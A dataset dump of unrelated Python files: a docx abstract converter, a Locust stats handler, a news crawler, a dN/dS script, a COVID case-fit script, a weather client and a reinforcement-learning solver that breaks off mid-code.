Please check the docx file manually as the submitter likely did not use the provided abstract template.\\n')\r\n        continue\r\n\r\n    # The first table has the abstract title (supposedly..)\r\n    abstract_title_components = [textfix(str(c)) for c in all_tables[0].find_all(['th', 'td'])[0].contents]\r\n    abstract_title = ''.join(abstract_title_components) ###Processed abstract title in latex format!\r\n\r\n    # The second table has the authors & affiliations (supposedly..)\r\n    # Extract all fields ('tr') in the authors & affiliations table\r\n    author_and_affil_fields = all_tables[1].find_all('tr')\r\n    author_list = []\r\n    associated_affil = []\r\n    for entry in author_and_affil_fields[1:]:\r\n        num_author = int(re.sub('[^0-9]', '', entry.find_all('td')[0].text))\r\n        author_name = entry.find_all('td')[1].text\r\n        # If no author in this line, skip over\r\n        if len(author_name) == 0:\r\n            continue\r\n        author_name = author_name.split(' ')\r\n        presenting = len(entry.find_all('td')[1].find_all('em')) > 0\r\n        author_affil = [a for a in re.sub('[^0-9]', ' ', entry.find_all('td')[2].text).split(' ') if a != '']\r\n        author_info = tuple([presenting] + author_name)\r\n        author_list.append(author_info)\r\n        associated_affil.append(author_affil)\r\n    # The format of the author_list and associated_affil: author entries are tuples: tuple(presenting?, from first name to last name); affiliations are lists of corresponding affiliation numbers as strings (not integers).\r\n\r\n    # The third table has the affiliation names\r\n    # Extract all fields ('tr') in the affiliations\r\n    affiliation_fields = all_tables[2].find_all('tr')\r\n    affil_dict = {}\r\n    for entry in affiliation_fields:\r\n        affil_num = int(re.sub('[^0-9]', '', entry.find_all(['td', 'th'])[0].text))\r\n        affil = entry.find_all(['td', 'th'])[1]\r\n        if affil.p is not None:\r\n            affil = affil.p.text\r\n        else:\r\n            affil = affil.text\r\n        if len(affil) > 0:\r\n            affil_dict[affil_num] = affil\r\n\r\n    # The fourth table has the abstract body text\r\n    abstract_content = [textfix(str(c)) for c in all_tables[3].find_all(['th', 'td'])[0].contents]\r\n    abstract_main = ''.join(abstract_content) ###Processed abstract text in latex format!\r\n\r\n    # The fifth table has the references\r\n    # Extract all fields ('tr') in the references\r\n    ref_list = {}  # stays empty if the references table is missing\r\n\r\n    if len(all_tables) > 4: #People who delete tables in the abstract template: I hate you. You are annoying!\r\n        reference_fields = all_tables[4].find_all('tr')\r\n        for entry in reference_fields:\r\n            ref_num = int(re.sub('[^0-9]', '', entry.find_all(['td', 'th'])[0].text))\r\n            ref = entry.find_all(['td', 'th'])[1]\r\n            fancy_texts = [str(x) for x in ref.find_all(['em', 'strong', 'sup'])]\r\n            raw_ref_text = entry.find_all(['td', 'th'])[1]\r\n            raw_ref_text = ''.join([textfix(str(c)) for c in raw_ref_text.contents])\r\n            if len(raw_ref_text) > 0:\r\n                ref_list[ref_num] = raw_ref_text\r\n\r\n    f.close()\r\n
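\r\n    # (Template recap: all_tables[0] = title, all_tables[1] = authors and\r\n    # affiliation numbers, all_tables[2] = affiliation names, all_tables[3] =\r\n    # abstract body, all_tables[4] = references.)\r\n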
\r\n    ##################### Part II. Writing TEX File #####################\r\n    write_latex(output_tex, abstract_title, author_list, associated_affil, affil_dict, abstract_main, figure=fig_name, width=0, height=0, references=ref_list)\r\n    print('\\n')\r\n\r\n# Remove temporary html files\r\nhtml_files = [f for f in os.listdir('.') if os.path.isfile(f) and os.path.splitext(f)[1] == '.html']\r\nfor htm in html_files:\r\n    os.remove(htm)","sub_path":"process_abstracts.py","file_name":"process_abstracts.py","file_ext":"py","file_size_in_byte":15124,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"148311826","text":"\n\nfrom xai.brain.wordbase.nouns._idyll import _IDYLL\n\n# class header\nclass _IDYLLS(_IDYLL):\n\tdef __init__(self):\n\t\t_IDYLL.__init__(self)\n\t\tself.name = \"IDYLLS\"\n\t\tself.specie = 'nouns'\n\t\tself.basic = \"idyll\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/nouns/_idylls.py","file_name":"_idylls.py","file_ext":"py","file_size_in_byte":231,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"44444754","text":"from locust import events\nfrom datetime import datetime\nimport time\nimport sys\nimport requests\nimport os\n\n\ndef write_process_time_on_file(content, file_prefix):\n    output_name = file_prefix + \"_process_time.txt\"\n    file = open(output_name, \"w\")\n    file.write(content)\n\n    file.close()\n\n\ndef send_stats_to_host(data, host):\n    raw_data = \"\"\n    for key in data.keys():\n        raw_data += key + \"=\" + str(data[key]) + \" \"\n    requests.post(host, data=raw_data)\n\n\ndef send_stats_to_local(data, file_prefix):\n    output_name = file_prefix + \"_stats.log\"\n    content = \"code \" + str(data[\"responseCode\"]) + \" | \" + \"time \" + data[\"responseTime\"] + \"\\n\"\n    file = open(output_name, \"a\")\n    file.write(content)\n\n    file.close()\n\n\ndef send_stats(data, host, file_name_prefix):\n    logger = os.environ[\"LOGGER\"]\n    if logger == \"http\":\n        send_stats_to_host(data, host)\n    elif logger == \"local\":\n        send_stats_to_local(data, file_name_prefix)\n\n\nclass EventHandler:\n\n    def __init__(self):\n        self.stats_host = \"http://88.147.126.145:8011\"\n        self.current = 0\n        self.stats_list = list()\n        self.stats_list.append({\n            \"start\": {\n                \"time\": 0.0,\n                \"utc\": None\n            },\n            \"end\": {\n                \"time\": 0.0,\n                \"utc\": None\n            },\n            \"diff\": 0.0,\n            \"started\": False\n        })\n        self.output_file_prefix = \"\"\n        self.set_output_file_prefix()\n\n    def add_callback_to_event(self):\n        events.request_success += self.on_request_success\n        events.master_start_hatching += self.on_master_start_hatching\n        events.master_stop_hatching += self.on_stop_hatching\n        events.locust_stop_hatching += self.on_stop_hatching\n\n    def reinit(self):\n        stats = {\n            \"start\": {\n                \"time\": 0.0,\n                \"utc\": None\n            },\n            \"end\": {\n                \"time\": 0.0,\n                \"utc\": None\n            },\n            \"diff\": 0.0,\n            \"started\": False\n        }\n        self.stats_list.append(stats)\n\n    def stats_to_string(self):\n        content = \"\"\n\n        for index, stats in enumerate(self.stats_list):\n            content += \"PROCESS TIME: execution \" + str(index + 1) + \"\\n\\n\"\n            content += \"Process started at: \" + str(stats[\"start\"][\"utc\"]) + \" (utc date)\\n\"\n            content += \"Process ended at: \" + str(stats[\"end\"][\"utc\"]) + \" (utc date)\\n\\n\"\n            if stats[\"end\"][\"utc\"] is None and stats[\"start\"][\"utc\"] is not None:\n                diff = time.time() - stats[\"start\"][\"time\"]\n                content += \"Process has been running for: \" + str(round(diff, 2)) + \" seconds\\n\"\n            else:\n                diff = stats[\"diff\"]\n                content += \"Process execution time was: \" + str(round(diff, 2)) + \" seconds\\n\"\n\n            content += \"------------------------------------------------------------------------\\n\\n\"\n\n        return content\n\n    def starting(self):\n        stats = self.stats_list[self.current]\n        if stats[\"started\"] is False:\n            stats[\"started\"] = True\n            stats[\"start\"][\"time\"] = time.time()\n            stats[\"start\"][\"utc\"] = datetime.utcnow()\n\n            self.stats_list[self.current] = stats\n\n    def stopping(self):\n        stats = self.stats_list[self.current]\n        stats[\"end\"][\"time\"] = time.time()\n        stats[\"end\"][\"utc\"] = datetime.utcnow()\n        stats[\"diff\"] = stats[\"end\"][\"time\"] - stats[\"start\"][\"time\"]\n\n        self.stats_list[self.current] = stats\n\n        write_process_time_on_file(self.stats_to_string(), self.output_file_prefix)\n\n        self.current += 1\n\n        self.reinit()\n\n    def on_request_success(self, request_type, name, response_time, response_length):\n        \"\"\"\n        Event handler that gets triggered on every successful request\n        \"\"\"\n        self.starting()\n        send_stats({\n            \"responseTime\": str(round(response_time, 1)),\n            \"name\": \"locust\",\n            \"responseCode\": 200\n        }, self.stats_host, self.output_file_prefix)\n\n    def on_request_failure(self, request_type, name, response_time, exception):\n        \"\"\"\n        Event handler that gets triggered on every failed request\n        \"\"\"\n        send_stats({\n            \"responseTime\": str(round(response_time, 1)),\n            \"name\": \"locust\",\n            \"responseCode\": 200\n        }, self.stats_host, self.output_file_prefix)\n\n    def on_master_start_hatching(self):\n        \"\"\"\n        Event handler that gets triggered when the master initiates the hatching process\n        \"\"\"\n        self.starting()\n\n    def on_stop_hatching(self):\n        self.stopping()\n\n    def set_output_file_prefix(self):\n        argv = sys.argv[1:]\n        for arg in argv:\n            if \"--csv=\" in arg:\n                self.output_file_prefix = arg.replace(\"--csv=\", \"\")\n","sub_path":"src/locust_files/event/event_handler.py","file_name":"event_handler.py","file_ext":"py","file_size_in_byte":4921,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"221854838","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Jul 27 14:53:21 2020\n\n@author: huang\n\"\"\"\n\n\ntotal=0\nfor num in range(1,101):\n    total=total+num\nprint('1+2+3+...+100 =',total)\n\ni=0\ntotal=0\nwhile i < 1001:\n    total=total+i\n    i=i+1\n\nprint('1+2+3+...+1000 =',total)
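\n\n# Worked check: by Gauss' formula n*(n+1)/2, the first loop gives\n# 100*101/2 = 5050 and the second (0 through 1000) gives 1000*1001/2 = 500500;\n# sum(range(1, 101)) computes the first total in a single call.\n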
","sub_path":"Python/Example/1+2+3……+100.py","file_name":"1+2+3……+100.py","file_ext":"py","file_size_in_byte":259,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"112674851","text":"# Copyright (c) 2019 Boocock James \n# Author: Boocock James \n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy of\n# this software and associated documentation files (the \"Software\"), to deal in\n# the Software without restriction, including without limitation the rights to\n# use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of\n# the Software, and to permit persons to whom the Software is furnished to do so,\n# subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in all\n# copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS\n# FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR\n# COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER\n# IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN\n# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.\n\nimport argparse\nfrom popgen_utils_bio2.analysis_functions_introgressions import get_dn_ds_from_alignment\nimport pyfasta\nfrom collections import OrderedDict\n\nimport os\n\ndef get_dn_ds_from_fasta(input_fasta, output_prefix):\n    try:\n        os.mkdir(output_prefix)\n    except OSError:\n        pass\n    fasta_in = pyfasta.Fasta(input_fasta)\n    genes = list(fasta_in.keys())\n    output_dn_ds = OrderedDict()\n    no_genes = False\n    if os.path.basename(input_fasta).startswith(\"N\"):\n        if \"permissive\" in input_fasta:\n            output_file = os.path.join(output_prefix, os.path.basename(input_fasta).split(\".permissive.fasta\")[0] + \".permissive.dn_ds\")\n        else:\n            output_file = os.path.join(output_prefix, os.path.basename(input_fasta).split(\".strict.fasta\")[0] + \".strict.dn_ds\")\n    else:\n        output_file = os.path.join(output_prefix, os.path.basename(input_fasta).split(\".fasta\")[0] + \".dn_ds\")\n    if os.path.exists(output_file):\n        with open(output_file) as out_f:\n            for line in out_f:\n                line_s = line.split(\"\\t\")\n                last_gene = line_s[0]\n        try:\n            idx = genes.index(last_gene)\n        except (NameError, ValueError):\n            no_genes = True\n            idx = 0\n    else:\n        # Do the whole thing\n        idx = 0\n        no_genes = True  # no previous output to copy over\n    with open(output_file + \"_final\", \"w\") as out_f:\n        if not no_genes:\n            with open(output_file) as out_f_old:\n                for line in out_f_old:\n                    gene = line.split(\"\\t\")[0]\n                    if gene != last_gene:\n                        out_f.write(line)\n        for gene in genes[(idx):]:\n            print(gene)\n            out_ds = get_dn_ds_from_alignment(input_fasta, these_samples=[gene], do_window=True, gene_name=gene, cbs_reference=False, window=200, step=10, hoffman=True)\n            if out_ds is not None:\n                rows = out_ds\n                out_f.write(str(gene) + \"\\tOVERALL\\t\" + str(rows[0][0]) + \"\\t\" + str(rows[0][1]) + \"\\n\")\n                for row in rows[1][gene]:\n                    out_f.write(str(gene) + \"\\tWINDOW\\t\" + str(row[0]) + \"\\t\" + str(row[1]) + \"\\n\")\n\n\ndef main():\n    parser = argparse.ArgumentParser(description=\"Calculate dn/ds from ssearch36 outputs\")\n    parser.add_argument(\"-o\", \"--output-prefix\", dest=\"output_prefix\", help=\"Output prefix\")\n    parser.add_argument(\"input_fasta\", help=\"input fasta file\")\n    args = parser.parse_args()\n    input_fasta_file = args.input_fasta\n    get_dn_ds_from_fasta(args.input_fasta, args.output_prefix)\n\nif __name__ == \"__main__\":\n    main()\n
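\n# A usage sketch (file names hypothetical; the flags are the ones defined\n# in main() above):\n#\n#     python process_fastas_to_dn_ds_followup2.py -o dn_ds_out genes.fasta\n#\n# This resumes a partial '.dn_ds' run if one exists and writes per-gene\n# OVERALL and WINDOW dN/dS rows to the '_final' output file.\n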
","sub_path":"scripts/process_fastas_to_dn_ds_followup2.py","file_name":"process_fastas_to_dn_ds_followup2.py","file_ext":"py","file_size_in_byte":3705,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"474514532","text":"from crawler.spiders import BaseSpider\n# Do not modify the imports in this file\nimport scrapy\nfrom utils.util_old import *\nfrom crawler.items import *\nfrom bs4 import BeautifulSoup\nfrom scrapy.http import Request, Response\nimport re\nimport time\nimport requests\nfrom datetime import datetime\nimport json\n\n# author: 陈宣齐\nclass SinchewSpider(BaseSpider):\n    name = 'sinchew'\n    website_id = 13 # website id (required)\n    language_id = 1813 # id of the language used\n    allowed_domains = ['sinchew.com.my']\n    start_urls = ['https://www.sinchew.com.my/']\n    sql = { # SQL connection config\n        'host': '192.168.235.162',\n        'user': 'dg_admin',\n        'password': 'dg_admin',\n        'db': 'dg_crawler'\n    }\n\n    # This is the class initializer, used to pass in the timestamp argument\n    \n    \n    \n\n    def parse(self, response, **kwargs):\n        soup = BeautifulSoup(response.text, 'lxml')\n        for i in soup.select('.dropdownlistbylist > a'):\n            yield Request(url=i.get('href'),callback=self.parse_2,meta={'category1':i.text})\n\n    def parse_2(self,response):\n        page_soup = BeautifulSoup(response.text, 'lxml')\n        img = ''\n        abstract = ''\n        last_time = ''\n        if page_soup.find('div', id='articlenum',style='width:670px;text-align:left;float:left;margin-top:30px;') is not None:\n            for i in page_soup.select('div #articlenum > li'):\n                new_url = i.find('a').get('href')\n                title = i.find('div', style='font-size:20px;').text\n                abstract = i.find('div', style='font-size:15px;padding-top:5px;').text\n                if i.find('img') is not None and i.find('img').get('src') != '/pagespeed_static/1.JiBnMqyl6S.gif':\n                    img = i.find('img').get('src')\n                pub_time = i.find('div', id='time').text\n                last_time = pub_time\n                if self.time is None or Util.format_time3(pub_time) >= int(self.time):\n                    yield scrapy.Request(new_url.strip(),callback=self.parse_3,meta={'category1':response.meta['category1'],'title':title,'pub_time':pub_time,'abstract':abstract,'img':img})\n                else:\n                    self.logger.info(\"Time cutoff reached\")\n        if page_soup.find('li', class_='page-next') is not None:\n            if self.time is None or Util.format_time3(last_time) >= int(self.time):\n                yield Request(url=page_soup.find('li', class_='page-next').find('a').get('href').strip(),callback=self.parse_2,meta={'category1':response.meta['category1']})\n            else:\n                self.logger.info(\"Time cutoff reached\")\n\n\n    def parse_3(self,response):\n        new_soup = BeautifulSoup(response.text, 'lxml')\n        item = NewsItem()\n        item['pub_time'] = response.meta['pub_time']\n        item['title'] = response.meta['title']\n        item['images'] = [response.meta['img']]\n        item['body'] = ''\n        for i in new_soup.find('div', id='dirnum').find_all('p'):\n            item['body'] += i.text\n        if response.meta['abstract'] == '':\n            item['abstract'] = item['body'].split('。')[0]\n        else:\n            item['abstract'] = response.meta['abstract']\n        item['category1'] = response.meta['category1']\n        item['category2'] = ''\n        yield item\n","sub_path":"crawler/v1/sinchew.py","file_name":"sinchew.py","file_ext":"py","file_size_in_byte":3255,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"52547615","text":"###-----------###\n### Importing ###\n###-----------###\nimport pandas as pd\nimport numpy as np\nimport datetime\nimport matplotlib.pyplot as plt\n\nfrom scipy.optimize import curve_fit\n\n###------------------###\n### Helper Functions ###\n###------------------###\n\n## Time series management\ndef national_timeseries(df, log=False):\n    '''\n    Returns a dataframe with the national number of COVID cases for Mexico where each row is indexed by a date (t0 = 2020-02-28).\n    If log=True, return the log of the cases.\n    '''\n    if log:\n        return np.log10( df.set_index('Fecha').loc[:,['México']] )\n    else:\n        return df.set_index('Fecha').loc[:,['México']]\n\n###-------###\n### Model ###\n###-------###\ndef exponential_model(t, y0, β): return y0 * np.exp(β*t)\n
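# For orientation: with y(t) = y0 * exp(β t), the fitted growth rate β\n# corresponds to a doubling time of ln(2)/β; e.g. β = 0.1 per day means\n# cases double roughly every 6.9 days.\n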
\n\nif __name__ == \"__main__\":\n\n    # Reading data\n    DATA_URL_MEX = 'https://raw.githubusercontent.com/mexicovid19/Mexico-datos/master/datos/series_de_tiempo/'\n    mex_confirmed = pd.read_csv(DATA_URL_MEX+'covid19_mex_casos_totales.csv', )\n\n    # paths for saving\n    PLOT_PATH = '../media/'\n    CSV_PATH = '../results/'\n    save_ = True\n\n    # Fit time window\n    n_days = 10\n    total_cases_timeseries = national_timeseries(mex_confirmed).iloc[-n_days:,0]\n\n    # Data preparation\n    xdata = np.array( range(len(total_cases_timeseries)) )\n    ydata = total_cases_timeseries.values\n\n    # Initial parameter guess\n    p0 = [ydata[-1], 0.1]\n\n    # Model parameter fit. Returns parameters and their covariance matrix\n    popt, pcov = curve_fit(exponential_model, xdata, ydata, p0)\n\n    # Projection days\n    forecast_horizon = 2 # days\n\n    # Growth rate std\n    σ = np.sqrt( pcov[1,1] )\n\n    # Fitting and projecting (np.arange rather than range: the model multiplies\n    # β by t, which a plain range object does not support)\n    xfit = np.arange( len(xdata) + forecast_horizon )\n    yfit = exponential_model(xfit, *popt)\n    yfit_min = exponential_model(xfit[-(forecast_horizon+1):], popt[0], popt[1] - 2*σ, )\n    yfit_max = exponential_model(xfit[-(forecast_horizon+1):], popt[0], popt[1] + 2*σ, )\n\n    # helper temporal values\n    trange = total_cases_timeseries.index.values\n    t0 = datetime.datetime.strptime( trange[0], '%Y-%m-%d')\n    tfit = [(t0 + datetime.timedelta(days=int(t))).strftime('%Y-%m-%d') for t in xfit ]\n\n    # Dataframe with fits and data\n    Data = national_timeseries(mex_confirmed)\n    Data['México'] = Data['México'].astype(int)\n    CSV = Data.join(pd.Series( np.round(yfit), tfit, name='Fit'), how='outer' )\n    CSV = CSV.join(pd.Series( np.round(yfit_min), tfit[-(forecast_horizon+1):], name='Fit_min'), how='outer' )\n    CSV = CSV.join(pd.Series( np.round(yfit_max), tfit[-(forecast_horizon+1):], name='Fit_max'), how='outer' )\n\n    # Plotting\n    plt.figure( figsize=(10,8) )\n    # plot data\n    plt.plot(trange, ydata, lw=0, marker='o', ms=8, label='data')\n    # plot fit\n    plt.plot(tfit, yfit, c='orange', label='exponential fit')\n    # error cones\n    plt.fill_between(tfit[-(forecast_horizon+1):], yfit_min, yfit_max,\n                     alpha=0.2, color='orange');\n\n    plt.title( 'Total COVID-19 cases in {}'.format( 'México' ) , size=16)\n    plt.ylabel('Number of cases', size=15);\n    plt.legend(loc='upper left')\n    plt.xticks(rotation=45)\n    # plt.yscale('log')\n    plt.tight_layout()\n\n    if save_:\n        plt.savefig( PLOT_PATH+'covid19_mex_fit.png' )\n        CSV.to_csv( CSV_PATH+'covid19_mex_fit.csv' )\n        plt.show()\n    else:\n        print(CSV)\n        plt.show()\n","sub_path":"src/run_exponential_fit.py","file_name":"run_exponential_fit.py","file_ext":"py","file_size_in_byte":3343,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"646776404","text":"#!/usr/bin/env python\r\n# encoding:utf-8\r\n# By eathings\r\n\r\nimport urllib\r\nimport urllib2\r\nimport re\r\nfrom xml.dom.minidom import parseString\r\n\r\n\r\nclass Weather:\r\n    def __init__(self):\r\n        self.url = \"http://www.webxml.com.cn/webservices/weatherwebservice.asmx/getWeatherbyCityName\"\r\n\r\n    def get_weather(self, thecityname):\r\n        url = self.url + \"?thecityname=\" + thecityname\r\n        result = urllib2.urlopen(url).read()\r\n        dom = parseString(result)\r\n        strings = dom.getElementsByTagName(\"string\")\r\n        temperature_of_today = self.getText(strings[5].childNodes)\r\n        weather_of_today = self.getText(strings[6].childNodes)\r\n        temperature_of_tomorrow = self.getText(strings[12].childNodes)\r\n        weather_of_tomorrow = self.getText(strings[13].childNodes)\r\n        weather_tips = self.getText(strings[11].childNodes)\r\n        weatherStr = u\"Weather for today and tomorrow:\\n %s %s; %s %s;\\n\" % \\\r\n                     (weather_of_today, temperature_of_today,\r\n                      weather_of_tomorrow, temperature_of_tomorrow)\r\n        weatherTips = u\"Friendly tip:\\n%s\" % weather_tips\r\n        print(weatherStr)\r\n        print(weatherTips)\r\n\r\n\r\n    def getText(self, nodelist):\r\n        \"\"\"\r\n        Collect the text of all child nodes\r\n        \"\"\"\r\n        rc = \"\"\r\n        for node in nodelist:\r\n            if node.nodeType == node.TEXT_NODE:\r\n                rc = rc + node.data\r\n        return rc\r\n\r\n\r\nweath = Weather()\r\nprint(\"Input city name :\")\r\nthecityname = raw_input()\r\nprint('city name:%s' % 
thecityname)\r\nweath.get_weather(thecityname)\r\n","sub_path":"PiaoyimqGeneralPythonCode/python-test/weather-view.py","file_name":"weather-view.py","file_ext":"py","file_size_in_byte":1574,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"518584019","text":"import os\nimport sys\nimport numpy as np\nimport torch\nimport math\nimport random\nfrom torch import nn\nimport torch.nn.functional as F\nfrom torch import distributions as pyd\nfrom copy import deepcopy\nfrom time import time\n\nimport mbopg.utils as utils\nfrom mbopg.actor import SacDiagGaussianActor, DiagGaussianActor\nfrom mbopg.critic import DoubleQCritic\nfrom mbopg.replay import ReplayBuffer\nfrom mbopg.memory.per import LazyPrioritizedMultiStepMemory\nfrom mbopg.artificial_replay import ArtificialReplayBuffer\n\n\nclass Policy():\n\n def __init__(self, actor, action_range, noise_dim, device, std):\n self.actor = actor\n self.action_range = action_range\n self.noise_dim = noise_dim\n self.device = device\n self.std = std\n \n def act(self, obs, sample=False):\n obs = torch.FloatTensor(obs).to(self.device)\n obs = obs.unsqueeze(0)\n action = self.actor(obs)\n action = action * self.action_range[0:-self.noise_dim]\n if sample:\n #action = dist.sample()\n action += self.std * torch.randn_like(action)\n action = torch.clamp(action, -1, 1)\n #else:\n # action = dist.mean\n #action = action * self.action_range[0:-self.noise_dim]\n action = action[0]\n #action = action[0, 0:-self.noise_dim]\n return action.detach().cpu().numpy()\n \n def save(self, filepath):\n save_dict = {\n 'actor': self.actor,\n 'action_range': self.action_range,\n 'noise_dim': self.noise_dim,\n 'std': self.std\n }\n torch.save(save_dict, filepath)\n \n def load(self, filepath, cpu=False):\n if cpu:\n save_dict = torch.load(filepath, map_location='cpu')\n else:\n save_dict = torch.load(filepath)\n self.actor = save_dict['actor']\n self.action_range = save_dict['action_range']\n self.noise_dim = save_dict['noise_dim']\n self.std = save_dict['std']\n\n\nclass MBRL_solver(nn.Module):\n\n def __init__(self, obs_dim, action_dim, horizon, epochs, actor_iterations_per_epoch, actor_repeat_per_epoch,\n critic_min_iterations_per_epoch,\n critic_max_iterations_per_epoch, critic_loss_threshold,\n critic_batch_size,\n critic_warmup_epochs,\n surrogate_epochs,\n surrogate_batchsize,\n surrogate_target_update_frequency,\n action_range, z_range, noise_dim, nprocs, comm, device,\n actor_logstd_bounds=[-5, 5], actor_hidden_dim=64, actor_hidden_layers=3, critic_hidden_dim=64, \n critic_hidden_layers=3, tau=0.005, surrogate_tau=0.005,\n actor_lr=1e-4, critic_lr=1e-4, actor_betas=[0.9, 0.999], \n critic_betas=[0.9, 0.999], capacity=1e5,\n gamma=0.99, alpha=0.1):\n super().__init__()\n self.obs_dim = obs_dim\n self.action_dim = action_dim + noise_dim\n self.horizon = horizon\n self.epochs = epochs\n self.nprocs = nprocs\n self.comm = comm\n\n self.actor_logstd_bounds = actor_logstd_bounds\n self.actor_iterations_per_epoch = actor_iterations_per_epoch\n self.actor_repeat_per_epoch = actor_repeat_per_epoch\n self.critic_min_iterations_per_epoch = critic_min_iterations_per_epoch\n self.critic_max_iterations_per_epoch = critic_max_iterations_per_epoch\n self.critic_loss_threshold = critic_loss_threshold\n self.critic_warmup_epochs = critic_warmup_epochs\n self.actor_hidden_dim = actor_hidden_dim\n self.actor_hidden_layers = actor_hidden_layers\n self.critic_hidden_dim = critic_hidden_dim\n self.critic_hidden_layers = 
critic_hidden_layers\n self.tau = tau\n self.actor_lr = actor_lr\n self.critic_lr = critic_lr\n self.actor_betas = actor_betas\n self.critic_betas = critic_betas\n self.capacity = capacity\n self.noise_dim = noise_dim\n\n self.surrogate_epochs = surrogate_epochs\n self.surrogate_batchsize = surrogate_batchsize\n self.surrogate_tau = surrogate_tau\n self.surrogate_target_update_frequency = surrogate_target_update_frequency\n\n self.gamma = gamma\n self.init_alpha = alpha\n\n self.critic_batch_size = critic_batch_size\n\n action_range = list(action_range) + list(z_range)\n\n if device == 'cuda':\n self.action_range = torch.cuda.FloatTensor(action_range)\n else:\n self.action_range = torch.FloatTensor(action_range)\n \n self.action_range.requires_grad = False\n\n self.device = device\n\n self.epsilon = 0.9\n\n self.surrogate_replay_buffer = ReplayBuffer(obs_shape=[self.obs_dim], action_shape=[self.action_dim - noise_dim], capacity=int(self.capacity), device=self.device)\n\n self.action_std = torch.tensor([0.4], device=device)\n self.noise_std = torch.tensor([0.2, 0.2, 0.2], device=device)\n self.total_std = torch.cat([self.action_std, self.noise_std], dim=-1)\n\n self.full_reset()\n \n def solve(self, network, dataset_states, verbose=True):\n self.reset()\n self._solve(network, dataset_states, verbose=verbose)\n #del self.replay_buffer\n #self.replay_buffer = None\n #torch.cuda.empty_cache()\n self.solve_surrogate(network)\n policy = self.surrogate_actor.state_dict()\n critic = self.surrogate_critic.state_dict()\n return policy, critic\n \n def make_policy(self, policy):\n actor = DiagGaussianActor(self.obs_dim, self.action_dim - self.noise_dim, self.actor_hidden_dim, self.actor_hidden_layers).to(self.device)\n actor.load_state_dict(policy)\n policy = Policy(actor, self.action_range, self.noise_dim, self.device, self.action_std)\n return policy\n \n def anneal_epsilon(self, initial_epsilon, final_epsilon, timestep, final_timestep):\n decay = (final_epsilon / initial_epsilon) ** (1.0 / final_timestep)\n return initial_epsilon * decay ** timestep\n\n @property\n def alpha(self):\n return self.log_alpha.exp()\n \n @property\n def surrogate_alpha(self):\n return self.surrogate_log_alpha.exp()\n\n def update_critic(self):\n obs, action, reward, next_obs, not_done, _ = self.replay_buffer.sample(self.critic_batch_size)\n\n dist = self.actor_target(next_obs)\n #dist = self.actor(next_obs)\n\n next_action = dist.sample()\n log_prob = dist.log_prob(next_action).sum(-1, keepdim=True)\n\n target_Q1, target_Q2 = self.critic_target(next_obs, next_action)\n target_V = torch.min(target_Q1, target_Q2)# - self.alpha.detach() * log_prob\n target_Q = reward + (not_done * self.gamma * target_V)\n target_Q = target_Q.detach()\n\n # get current Q estimates\n current_Q1, current_Q2 = self.critic(obs, action)\n critic_loss = F.mse_loss(current_Q1, target_Q) + F.mse_loss(current_Q2, target_Q)\n # Optimize the critic\n self.critic_optimizer.zero_grad()\n critic_loss.backward()\n torch.nn.utils.clip_grad_norm_(self.critic.parameters(), 50.0)\n self.critic_optimizer.step()\n\n return critic_loss.detach()\n\n def update_alpha(self, total_log_probs):\n self.log_alpha_optimizer.zero_grad()\n total_log_probs = total_log_probs / (self.nprocs * self.horizon * self.actor_iterations_per_epoch)\n alpha_loss = (self.alpha * (-total_log_probs - self.target_entropy).detach()).mean()\n alpha_loss.backward()\n torch.nn.utils.clip_grad_norm_([self.log_alpha], 5.0)\n self.log_alpha_optimizer.step()\n\n def _solve_once(self, network, 
dataset_states, epsilon_greedy=False):\n total_log_probs = []\n initial_obs = []\n\n for _ in range(self.actor_iterations_per_epoch):\n init_obs = dataset_states[np.random.randint(0, len(dataset_states))]\n for _ in range(self.actor_repeat_per_epoch):\n initial_obs.append(init_obs)\n\n obs = torch.stack(initial_obs, dim=0)\n \n states = []\n actions = []\n log_probs = []\n rewards = []\n dones = []\n Ws = []\n \n for t in range(self.horizon):\n dist = self.actor(obs)\n action = dist.rsample()\n\n log_prob = dist.log_prob(action).sum(-1)\n out_action = action * self.action_range.unsqueeze(dim=0)\n\n act_action = out_action[:, 0:-self.noise_dim]\n\n z = out_action[:, -self.noise_dim:]\n\n w = network.sample(1, z)\n\n next_obs, reward, done = network.primarynet.batch_mbrl(obs, act_action, w)\n \n next_obs = next_obs[:, 0]\n reward = reward[:, 0, 0]\n done = done[:, 0, 0]\n \n \"\"\"\n self.replay_buffer.add(obs.detach(),\n action.detach(), \n reward.unsqueeze(dim=-1).detach(), \n next_obs.detach(), \n (done.unsqueeze(dim=-1) > 0.5).float().detach(),\n False)\n \"\"\"\n \n states.append(obs)\n actions.append(action)\n log_probs.append(log_prob)\n dones.append(done)\n rewards.append(reward)\n total_log_probs.append(log_prob)\n Ws.append(w)\n\n obs = next_obs\n\n if t + 1 == self.horizon:\n next_state = next_obs\n dist = self.actor(next_state)\n next_action = dist.rsample()\n next_log_prob = dist.log_prob(next_action).sum(-1)\n break\n\n states.append(next_state)\n actions.append(next_action)\n log_probs.append(next_log_prob)\n \n #Q1, Q2 = 